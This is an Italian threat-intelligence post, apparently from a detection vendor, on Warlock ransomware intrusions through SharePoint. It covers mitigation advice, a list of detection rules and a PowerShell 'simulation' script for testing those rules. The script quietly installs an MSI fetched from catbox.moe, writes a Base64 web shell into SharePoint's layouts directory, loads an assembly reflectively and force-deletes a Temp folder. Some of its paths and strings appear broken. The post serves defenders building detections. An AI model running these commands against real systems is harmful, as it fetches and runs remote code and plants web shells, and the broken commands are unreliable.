SOC Prime Bias: Critical

05 Oct 2026 17:09 UTC

Attacchi del ransomware Warlock contro infrastrutture critiche di acqua e telecomunicazioni

Author Photo
SOC Prime Team linkedin icon Segui
Attacchi del ransomware Warlock contro infrastrutture critiche di acqua e telecomunicazioni
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Un attore di minacce connesso alla Cina, monitorato come Longlegs, sta distribuendo il ransomware Warlock sfruttando le vulnerabilità di Microsoft SharePoint. Il gruppo utilizza una catena di exploit ToolShell per accedere inizialmente prima di muoversi lateralmente attraverso le reti compromesse. Gli attaccanti impiegano anche tecniche avanzate di evasione, inclusi l’abuso di driver vulnerabili per disabilitare il software di sicurezza e l’utilizzo di servizi cloud legittimi per la consegna del payload.

Indagine

L’indagine ha tracciato le attività dallo sfruttamento iniziale di SharePoint al dispiegamento di una webshell all’interno della directory LAYOUTS. Gli analisti hanno osservato l’uso di chiavi macchina ASP.NET falsificate per l’esecuzione di codice remoto e il ransomware preparato nella condivisione SYSVOL per la distribuzione a livello di dominio. La catena d’attacco ha coinvolto anche il caricamento di DLL e l’abuso della funzionalità di tunneling di Visual Studio Code per l’accesso persistente.

Mitigazione

Le organizzazioni dovrebbero dare priorità all’applicazione di patch su Microsoft SharePoint Server per risolvere le vulnerabilità conosciute di ToolShell. Applicare controlli rigorosi sui driver firmati ma vulnerabili può aiutare a prevenire attacchi BYOVD. I team di sicurezza dovrebbero anche monitorare l’uso anomalo di strumenti living-off-the-land e limitare l’accesso alla condivisione SYSVOL per attività non amministrative per ridurre il movimento laterale e il dispiegamento di ransomware.

Risposta

Quando viene rilevata un’attività malevola, i responder agli incidenti dovrebbero isolare i server SharePoint compromessi e ispezionare la condivisione SYSVOL alla ricerca di script o binari non autorizzati. Eseguire un controllo completo degli account di dominio, concentrandosi su aggiunte non autorizzate al gruppo Administrators locale. Rivedere il traffico di rete per connessioni in uscita verso servizi di condivisione file come catbox.moe o wasabisys.com utilizzati per la preparazione del payload.

Flusso di Attacco

Rilevamenti

Aggiungi Utente agli Amministratori Locali (via cmdline)

Squadra SOC Prime
05 Ott 2026

Scarica o Carica tramite Powershell (via cmdline)

Squadra SOC Prime
05 Ott 2026

Stringhe Powershell Sospette (via cmdline)

Squadra SOC Prime
05 Ott 2026

Chiama Classi/Metodi .NET Sospetti dal Comando Powershell (via process_creation)

Squadra SOC Prime
05 Ott 2026

Possibile Scoperta di Condivisioni di Rete (via cmdline)

Squadra SOC Prime
05 Ott 2026

Scoperta di Trust di Dominio Sospetti (via cmdline)

Squadra SOC Prime
05 Ott 2026

Possibile Tentativo di Installazione di File MSI Remoti (via cmdline)

Squadra SOC Prime
05 Ott 2026

Esecuzione Sospetta da Profilo Utente Pubblico (via process_creation)

Squadra SOC Prime
05 Ott 2026

Stringhe Powershell Sospette (via powershell)

Squadra SOC Prime
05 Ott 2026

Chiama Metodi .NET Sospetti da Powershell (via powershell)

Squadra SOC Prime
05 Ott 2026

Possibile Creazione di Webshell in Directory Microsoft Exchange/Sharepoint (via file_event)

Squadra SOC Prime
05 Ott 2026

File Sospetti in Profilo Utente Pubblico (via file_event)

Squadra SOC Prime
05 Ott 2026

Possibile Infiltrazione/Esfiltrazione Dati/C2 tramite Servizi/Tool di Terze Parti (via proxy)

Squadra SOC Prime
05 Ott 2026

Possibile Infiltrazione/Esfiltrazione Dati/C2 tramite Servizi/Tool di Terze Parti (via dns)

Squadra SOC Prime
05 Ott 2026

Comando e Controllo Sospetto mediante Richiesta a Dominio di Interazioni Out-of-Band (via dns)

Squadra SOC Prime
05 Ott 2026

IOC (HashSha256) per rilevare: Attaccanti del Ransomware Warlock Colpiscono Operatori Idrici e delle Telecomunicazioni

Regole AI SOC Prime
05 Ott 2026

Rilevamento di Comando PowerShell Malevolo per Esecuzione di Codice [Windows Powershell]

Regole AI SOC Prime
05 Ott 2026

Preparazione ed Esecuzione del Ransomware Warlock tramite Condivisioni di Rete [Evento di File Windows]

Regole AI SOC Prime
05 Ott 2026

Indicatori di Ransomware Warlock su Server SharePoint [Creazione Processo Windows]

Regole AI SOC Prime
05 Ott 2026

Esecuzione di Simulazione

Prerequisito: Il Controllo di Pre-volo Telemetria & Baseline deve essere superato.

Motivo: Questa sezione dettaglia l’esatta esecuzione della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrativa & Comandi d’Attacco: L’avversario mira a distribuire il ransomware Warlock su un server SharePoint. L’attacco inizia utilizzando msiexec per prelevare un MSI malevolo da un dominio controllato dagli attaccanti (catbox.moe). Seguito dell’iniziale appoggio, l’attaccante utilizza PowerShell per scrivere una web shell ASPX malevola nel percorso di SharePoint layout2sp.aspx utilizzando un payload codificato in Base64 per bypassare filtri semplici delle stringhe. Infine, l’attaccante tenta di caricare un’assembly .NET malevola direttamente in memoria utilizzando System.Workflow.ComponentModel per eseguire codice senza lasciare un’impronta sul disco.

  • Script di Test di Regressione:

    # Script di Simulazione del Ransomware Warlock
    # NOTA: Questo script è solo per scopi di test autorizzati.
    
    Write-Host "[!] Avvio della Simulazione del Ransomware Warlock..." -ForegroundColor Red
    
    # 1. Simulazione Download Remoto MSIEXEC (Selezione 3)
    Write-Host "[*] Simulazione download payload remoto MSIEXEC..."
    Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue
    
    # 2. Simulazione Drop Web Shell ASPX tramite PowerShell (Selezione 1)
    # Utilizziamo la stringa esatta dalla regola per garantire il rilevamento
    Write-Host "[*] Simulazione drop web shell tramite Base64..."
    $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))"""
    Invoke-Expression $cmd1
    
    # 3. Simulazione Caricamento Riflettente Assembly (Selezione 2)
    Write-Host "[*] Simulazione di Caricamento Riflettente Assembly..."
    $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel"
    Invoke-Expression $cmd2
    
    Write-Host "[+] Comandi di simulazione inviati." -ForegroundColor Green
  • Comandi di Pulizia:

    # Script di pulizia per rimuovere eventuali artefatti creati durante la simulazione
    Write-Host "[!] Pulizia degli artefatti di simulazione..." -ForegroundColor Yellow
    
    # Rimuovere file simulati (Nota: In un test reale, si indirizzerebbero i percorsi specifici creati)
    # Poiché abbiamo usato stringhe fittizie, ci assicuriamo principalmente che non siano stati depositati file malevoli effettivi.
    Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "[+] Pulizia completata." -ForegroundColor Green